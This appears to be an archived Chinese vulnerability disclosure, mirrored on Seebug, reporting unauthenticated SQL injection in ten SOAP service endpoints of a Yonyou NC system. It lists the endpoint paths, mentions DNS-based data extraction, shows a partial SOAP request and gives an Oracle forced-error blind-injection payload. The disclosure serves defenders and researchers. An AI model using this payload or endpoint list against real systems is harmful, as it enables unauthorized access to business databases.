Lucene search

K
seebugRootSSV:93396
HistoryApr 19, 2016 - 12:00 a.m.

用友某系统多处注入漏洞打包

2016-04-1900:00:00
Root
www.seebug.org
108

简要描述:

wooyun搜了一下,没有人提,来一发。

详细说明:

首先,该接口是无需权限访问的。
已http://.../bugs/wooyun-2010-0178322为例:...:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl**...:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl...:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl...:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl...:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl...:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl...:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl...:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl...:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl...**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl
均存在注入

<img src=“https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png” alt=“04184.png” width=“600”>

<img src=“https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png” alt=“04185.png” width=“600”>

无法报错注入的,因为我们填充的数据是随意填充的,也没有办法盲注,可以使用dns查询的方式。

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService
&lt;soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService"&gt;
   &lt;soapenv:Header/&gt;
   &lt;soapenv:Body&gt;
      &lt;icur:exportCurrtypeToCrm&gt;

<img src=“https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png” alt=“04186.png” width=“600”>

还有一种情况是无法报错注入,也不能盲注,延时也不可以,可以使用强制报错盲注的办法:
'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT(‘USERENV’,‘DB_NAME’) from dual))=4) THEN 1 ELSE CAST(‘a’ AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 来猜解数据。

漏洞证明:

http://...:9090/